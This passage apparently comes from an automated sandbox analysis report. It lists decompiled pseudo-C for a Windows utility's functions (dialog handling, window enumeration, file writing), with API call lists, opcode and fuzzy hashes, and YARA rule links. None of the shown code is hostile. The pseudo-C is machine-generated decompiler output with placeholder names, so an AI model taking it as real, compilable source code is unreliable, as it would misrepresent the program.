                                                                                                                                                • API String ID: 3888421826-0
                                                                                                                                                • Opcode ID: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
                                                                                                                                                • Instruction ID: ea6b6bb6de5f5fc2c04e1b050f2a77b7acc78c850c927156145779c4c3b5f003
                                                                                                                                                • Opcode Fuzzy Hash: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
                                                                                                                                                • Instruction Fuzzy Hash: FEF01975A0010CFFEB119F95CDC5DAFBBB9EB49794F20447AFA04E6150D2709E01AA64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00402F8E, Relevance: 6.0, APIs: 4, Instructions: 46windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E00402F8E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HWND__* _t16;
				intOrPtr* _t36;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t49;

				_t40 = __edx;
				_push(__ebx);
				_t47 = __ecx;
				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
				E0040DB6F(GetDlgItem( *(_t47 + 0x10), 0x3f1));
				SetFocus(GetDlgItem( *(_t47 + 0x10), 0x3ee));
				_t16 = GetDlgItem( *(_t47 + 0x10), 0x3ee);
				E00405700(_t16, E00406827(0x3b7), 1);
				E00405700(_t16, E00406827(0x3b8), 2);
				E0040300B(_t47);
				_t36 = _t47;
				_pop(_t48);
				_t49 = _t36;
				 *((intOrPtr*)( *_t49 + 4))(1, _t48);
				 *((intOrPtr*)( *_t49 + 0x1c))();
				E00405B17(_t40,  *((intOrPtr*)(_t49 + 0x10)), 4);
				return 0;
			}








                                                                                                                                                0x00402f8e
                                                                                                                                                0x00402f8e
                                                                                                                                                0x00402f90
                                                                                                                                                0x00402f99
                                                                                                                                                0x00402faf
                                                                                                                                                0x00402fc2
                                                                                                                                                0x00402fcc
                                                                                                                                                0x00402fdc
                                                                                                                                                0x00402ff2
                                                                                                                                                0x00402ffc
                                                                                                                                                0x00403002
                                                                                                                                                0x00403004
                                                                                                                                                0x0040165a
                                                                                                                                                0x00401660
                                                                                                                                                0x00401667
                                                                                                                                                0x0040166f
                                                                                                                                                0x00401679

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                • GetDlgItem.USER32 ref: 00402FAC
                                                                                                                                                  • Part of subcall function 0040DB6F: LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,00402FB4,00000000), ref: 0040DB78
                                                                                                                                                  • Part of subcall function 0040DB6F: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
                                                                                                                                                  • Part of subcall function 0040DB6F: FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E
                                                                                                                                                • GetDlgItem.USER32 ref: 00402FBF
                                                                                                                                                • SetFocus.USER32(00000000), ref: 00402FC2
                                                                                                                                                • GetDlgItem.USER32 ref: 00402FCC
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                  • Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
                                                                                                                                                  • Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729
                                                                                                                                                  • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                  • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemWindow$HandleLibraryLoadMessageModuleSend$AddressClientFocusFreeProcRectStringmemcpywcscpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2946568780-0
                                                                                                                                                • Opcode ID: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
                                                                                                                                                • Instruction ID: 30f591fb8b2f5730a97996d02f89d272a17373ddbf4734e32a48e8550da6c286
                                                                                                                                                • Opcode Fuzzy Hash: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
                                                                                                                                                • Instruction Fuzzy Hash: 46F0C8B2A00700E7D22177B6AC46E2B76ACEF84719F06093EF541F71D2CA799D055658
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040877D, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                			E0040877D(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v32775;
				char _v32776;

				E0040E340(0x8004, __ecx);
				_v32776 = 0;
				memset( &_v32775, 0, 0x7fff);
				WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v32776, 0x7fff, 0, 0);
				return WriteFile(_a4,  &_v32776, strlen( &_v32776),  &_v8, 0);
			}






                                                                                                                                                0x00408785
                                                                                                                                                0x0040879c
                                                                                                                                                0x004087a2
                                                                                                                                                0x004087bf
                                                                                                                                                0x004087eb

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004087A2
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000003,000000FF,?,00007FFF,00000000,00000000), ref: 004087BF
                                                                                                                                                • strlen.MSVCRT ref: 004087D1
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 004087E2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
                                                                                                                                                • Instruction ID: be2e12bba75bd4d95a24d89f44609daf6c821d09d66759c01e9b41f40a714cd1
                                                                                                                                                • Opcode Fuzzy Hash: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
                                                                                                                                                • Instruction Fuzzy Hash: 66F062B640112CBEEB91AB95DD81DEB776CEB04258F0045B2B705E6180D974AE484F7C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004087EC, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                			E004087EC(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040E340(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                                                0x004087f4
                                                                                                                                                0x0040880b
                                                                                                                                                0x00408811
                                                                                                                                                0x0040882a
                                                                                                                                                0x00408856

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00408811
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000003,000000FF,?,00001FFF,00000000,00000000), ref: 0040882A
                                                                                                                                                • strlen.MSVCRT ref: 0040883C
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 0040884D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
                                                                                                                                                • Instruction ID: 1e840beb1bf30e5fccbc8f780a259ac9f9e503c3acfa46e2f16182fe3cbfa9d3
                                                                                                                                                • Opcode Fuzzy Hash: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
                                                                                                                                                • Instruction Fuzzy Hash: 5AF06DB340022CBEEB159B95DDC8DEB776CDB08254F0005B6B705E2082D674AE488B78
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040D4A5, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 19%
                                                                                                                                                			E0040D4A5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040D12C(__ecx, __ecx, __eflags);
					E00405B17(_t26,  *((intOrPtr*)(__ecx + 0x10)), 4);
					L5:
					return E004015CE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E00405954(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, 0xffffff);
					SetTextColor(_a8, 0xc00000);
					return GetStockObject(0);
				}
			}







                                                                                                                                                0x0040d4a5
                                                                                                                                                0x0040d4ab
                                                                                                                                                0x0040d4b1
                                                                                                                                                0x0040d4b3
                                                                                                                                                0x0040d4f8
                                                                                                                                                0x0040d502
                                                                                                                                                0x0040d509
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d514
                                                                                                                                                0x0040d4b8
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d4c7
                                                                                                                                                0x0040d4cc
                                                                                                                                                0x0040d4da
                                                                                                                                                0x0040d4e8
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d4f0

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00405954: memset.MSVCRT ref: 00405973
                                                                                                                                                  • Part of subcall function 00405954: GetClassNameW.USER32 ref: 0040598A
                                                                                                                                                  • Part of subcall function 00405954: _wcsicmp.MSVCRT ref: 0040599C
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040D4CC
                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 0040D4DA
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 0040D4E8
                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 0040D4F0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                • Opcode ID: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
                                                                                                                                                • Instruction ID: 94e493e720f5362771ebb13374b41de4394e2b92cb987e20627275f4cfdde941
                                                                                                                                                • Opcode Fuzzy Hash: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
                                                                                                                                                • Instruction Fuzzy Hash: 8BF08132100204BBDF212FA4DD06A9A3F65EF04724F108136FA14B95F2CB75A9689E48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401482, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00401482() {
				intOrPtr _t14;
				struct HWND__* _t17;
				intOrPtr _t25;
				void* _t26;

				if( *0x412394 == 2) {
					ExitProcess(1);
				}
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				_t25 =  *((intOrPtr*)(_t26 + 8));
				if( *(_t26 + 0xc) == 0x110) {
					_t17 =  *(_t25 + 0x10);
					 *(_t26 + 0xc) = _t17;
					if( *0x412ecc != 0) {
						EnumChildWindows(_t17, E00406B34, 2);
						EnumChildWindows( *(_t26 + 0xc), E00406B34, 1);
						E00405D0F( *(_t26 + 0xc), 0x400000);
					}
				}
				if( *((intOrPtr*)(_t25 + 8)) != 0) {
					SetWindowLongW( *(_t25 + 0x10), 0,  *(_t25 + 0xc));
				}
				_t14 =  *((intOrPtr*)(_t26 - 0x1c));
				return E0040E2F1(_t14);
			}







                                                                                                                                                0x0040148c
                                                                                                                                                0x00401490
                                                                                                                                                0x00401490
                                                                                                                                                0x00401496
                                                                                                                                                0x0040149a
                                                                                                                                                0x004014a4
                                                                                                                                                0x004014a6
                                                                                                                                                0x004014a9
                                                                                                                                                0x004014b3
                                                                                                                                                0x004014c4
                                                                                                                                                0x004014cc
                                                                                                                                                0x004014d6
                                                                                                                                                0x004014dc
                                                                                                                                                0x004014b3
                                                                                                                                                0x004014e1
                                                                                                                                                0x004014eb
                                                                                                                                                0x004014eb
                                                                                                                                                0x004014f1
                                                                                                                                                0x004014fd

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChildEnumWindows$ExitLongProcessWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2626381504-0
                                                                                                                                                • Opcode ID: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
                                                                                                                                                • Instruction ID: e2987c10faa884b4915a7f97f1375000f64f28bf07688916d28e14d934a6fd2a
                                                                                                                                                • Opcode Fuzzy Hash: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
                                                                                                                                                • Instruction Fuzzy Hash: 15011A30500209EFDB249F55ED0AB9A37A1EB00324F20C579F9657A5F0C7B96854DF18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040C3B4, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040C3B4(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x413258 == 0) {
					memcpy(0x412668,  *__eax, 0x50);
					memcpy(0x412398,  *(_t11 + 4), 0x2cc);
					 *0x413258 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E0040C0C7, 0);
					 *0x413258 =  *0x413258 & 0x00000000;
					 *0x412394 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                                                0x0040c3bc
                                                                                                                                                0x0040c3be
                                                                                                                                                0x0040c3ce
                                                                                                                                                0x0040c3e0
                                                                                                                                                0x0040c3ed
                                                                                                                                                0x0040c407
                                                                                                                                                0x0040c40d
                                                                                                                                                0x0040c414
                                                                                                                                                0x0040c41c
                                                                                                                                                0x0040c3c0
                                                                                                                                                0x0040c3c4
                                                                                                                                                0x0040c3c4

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1386444988-0
                                                                                                                                                • Opcode ID: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
                                                                                                                                                • Instruction ID: 89add42b0ad0b7d68bf63fa0eb6c53c6f7d1aed99d4242a64f88595bbbc02ed0
                                                                                                                                                • Opcode Fuzzy Hash: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
                                                                                                                                                • Instruction Fuzzy Hash: 3EF08232650360FBE7207FA4AD46BDA7A90E744B12F20457AF644F50E1C2F915658B8C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401712, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00401712(struct HWND__* __eax, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t12;
				struct HWND__* _t13;
				void* _t16;

				_t16 = __edi;
				_t12 = __eax;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				GetClientRect(__eax, __edi + 0x24);
				E00403F55(__edi + 0x14);
				_t13 = GetWindow(GetWindow(_t12, 5), 0);
				while(1) {
					E0040169B(_t9, _t16);
					_t11 = GetWindow(_t13, 2);
					_t13 = _t11;
					if(_t13 == 0) {
						break;
					}
					_t9 = _t13;
				}
				return _t11;
			}








                                                                                                                                                0x00401712
                                                                                                                                                0x00401713
                                                                                                                                                0x0040171b
                                                                                                                                                0x0040171e
                                                                                                                                                0x00401727
                                                                                                                                                0x0040173c
                                                                                                                                                0x00401742
                                                                                                                                                0x00401744
                                                                                                                                                0x0040174c
                                                                                                                                                0x0040174e
                                                                                                                                                0x00401752
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401740
                                                                                                                                                0x00401740
                                                                                                                                                0x00401756

                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32 ref: 0040171E
                                                                                                                                                  • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                • GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                  • Part of subcall function 0040169B: GetWindowRect.USER32 ref: 004016AD
                                                                                                                                                  • Part of subcall function 0040169B: MapWindowPoints.USER32 ref: 004016BE
                                                                                                                                                  • Part of subcall function 0040169B: free.MSVCRT(?,?,?), ref: 004016DB
                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rectfree$ClientPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3078297017-0
                                                                                                                                                • Opcode ID: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
                                                                                                                                                • Instruction ID: 3c878aa69d1487aa6e46661a708a7683238dcb4edfadfd8cd86f08b3a4e73e8d
                                                                                                                                                • Opcode Fuzzy Hash: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
                                                                                                                                                • Instruction Fuzzy Hash: D7E0EDA170071667D6106BB59DC5A6666ACBB08341F000436B60AF7592DBB8AD148BA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040B31A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                			E0040B31A(char* __ecx, void* __edx, short _a4, short _a8) {
				char _v518;
				char _v1028;
				char _v1092;
				signed int _v1100;
				char _v1172;
				char* _v1176;
				intOrPtr _v1184;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t74;
				void* _t93;
				intOrPtr _t113;
				void* _t114;
				char* _t116;
				intOrPtr _t132;

				_t114 = __edx;
				_t112 = __ecx;
				_push(_t108);
				_t116 = __ecx;
				_v1176 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t142 = _a8 - 0x9c62;
					if(_a8 == 0x9c62) {
						_t108 = _t116;
						_t74 = E0040AD95(_t116, _t142);
					}
					_t143 = _a8 - 0x9c5f;
					if(_a8 == 0x9c5f) {
						_t74 = E0040AE4D(_t74, _t112, _t114, _t116, _t143);
					}
					if(_a8 == 0x9c5e) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						_t74 = E004080C5( *((intOrPtr*)(_t116 + 0x69c)), _t112);
					}
					if(_a8 == 0x9c5c) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						E0040A3BF(_t116);
						_t74 = InvalidateRect( *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac), 0, 0);
					}
					if(_a8 == 0x9c42) {
						_t74 = DestroyWindow( *(_t116 + 0x208));
					}
					if(_a8 == 0x9c49) {
						_t108 = _t116;
						_t74 = E0040B0C2(_t116);
					}
					if(_a8 == 0x9c56) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 8) =  *( *((intOrPtr*)(_t116 + 0x698)) + 8) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						_t74 = E0040A6FF(_t116);
					}
					if(_a8 == 0x9c44) {
						_t74 = E00401BDC(_t116, 0x415);
					}
					if(_a8 == 0x9c43) {
						E0040133A( &_v1092);
						_v1092 = 0x410428;
						E00401000( &_v1028, _t112, 0x412290);
						_t108 =  &_v518;
						E00401000( &_v518, _t112, 0x4122c4);
						_t132 = _v1176;
						_push( *((intOrPtr*)(_t132 + 0x208)));
						_push( &_v1092);
						_t93 = 0x70;
						E0040152F(_t93);
						E004077CB( *((intOrPtr*)(_t132 + 0x69c)));
						_t74 = E00401357( &_v1100);
						_t116 = _t132;
					}
					_t154 = _a8 - 0x9c41;
					if(_a8 == 0x9c41) {
						_t74 = E0040AF7D(_t112, _t114, _t116, _t154);
					}
					if(_a8 != 0x9c47) {
						L27:
						__eflags = _a8 - 0x9c4f;
						if(_a8 != 0x9c4f) {
							L31:
							__eflags = _a8 - 0x9c48;
							if(__eflags == 0) {
								_t74 = E0040AF02(_t108, _t114, _t116, _t116, __eflags);
							}
							__eflags = _a8 - 0x9c45;
							if(_a8 == 0x9c45) {
								 *( *((intOrPtr*)(_t116 + 0x698)) + 4) =  *( *((intOrPtr*)(_t116 + 0x698)) + 4) ^ 0x00000001;
								__eflags = 0;
								E0040A1DC(0, _t112, _t116, 0);
								_t74 = E0040A6FF(_t116);
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 0);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 1);
							}
							__eflags = _a8 - 0x9c65;
							if(__eflags == 0) {
								_t74 = E0040B054(_t116, __eflags);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								E0040133A( &_v1172);
								_v1100 = _v1100 & 0x00000000;
								_v1172 = 0x40f7a8;
								E00403584( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e4)),  &_v1172,  *(_t116 + 0x208),  *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac));
								_t82 = _v1184;
								_t113 =  *((intOrPtr*)(_v1184 + 0x698));
								__eflags =  *((intOrPtr*)(_t113 + 0x224));
								if( *((intOrPtr*)(_t113 + 0x224)) != 0) {
									__eflags =  *((intOrPtr*)(_t113 + 0x2228)) - 2;
									if( *((intOrPtr*)(_t113 + 0x2228)) == 2) {
										E0040B00A(_t82);
									}
								}
								_v1172 = 0x40f7a8;
								_t74 = E00401357( &_v1172);
								_t116 = _v1176;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t74 = E00407E76( *((intOrPtr*)(_t116 + 0x69c)));
							}
							__eflags = _a8 - 0x9c58;
							if(_a8 == 0x9c58) {
								_t74 = E00407EBC( *((intOrPtr*)(_t116 + 0x69c)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t74 = E004097F2( *(_t116 + 0x208),  *((intOrPtr*)(_t116 + 0x69c)));
							}
							goto L52;
						}
						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
						__eflags =  *((intOrPtr*)(_t88 + 0x2e8));
						if( *((intOrPtr*)(_t88 + 0x2e8)) == 0) {
							_t74 = E004077D8(_t88, 0xffffffff, 0, 2);
							goto L31;
						}
						_push(0xf000);
						_push(0x1000);
						goto L25;
					} else {
						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
						if( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e8)) == 0) {
							_t74 = E004077D8(_t88, 0xffffffff, 2, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x2000);
						L25:
						_push(0xffffffff);
						_t74 = E004077D8(_t88);
						goto L52;
					}
				} else {
					L52:
					return _t74;
				}
			}



















                                                                                                                                                0x0040b31a
                                                                                                                                                0x0040b31a
                                                                                                                                                0x0040b32b
                                                                                                                                                0x0040b32e
                                                                                                                                                0x0040b330
                                                                                                                                                0x0040b334
                                                                                                                                                0x0040b341
                                                                                                                                                0x0040b347
                                                                                                                                                0x0040b349
                                                                                                                                                0x0040b34b
                                                                                                                                                0x0040b34b
                                                                                                                                                0x0040b350
                                                                                                                                                0x0040b356
                                                                                                                                                0x0040b35a
                                                                                                                                                0x0040b35a
                                                                                                                                                0x0040b365
                                                                                                                                                0x0040b36d
                                                                                                                                                0x0040b371
                                                                                                                                                0x0040b375
                                                                                                                                                0x0040b380
                                                                                                                                                0x0040b380
                                                                                                                                                0x0040b38b
                                                                                                                                                0x0040b393
                                                                                                                                                0x0040b397
                                                                                                                                                0x0040b39b
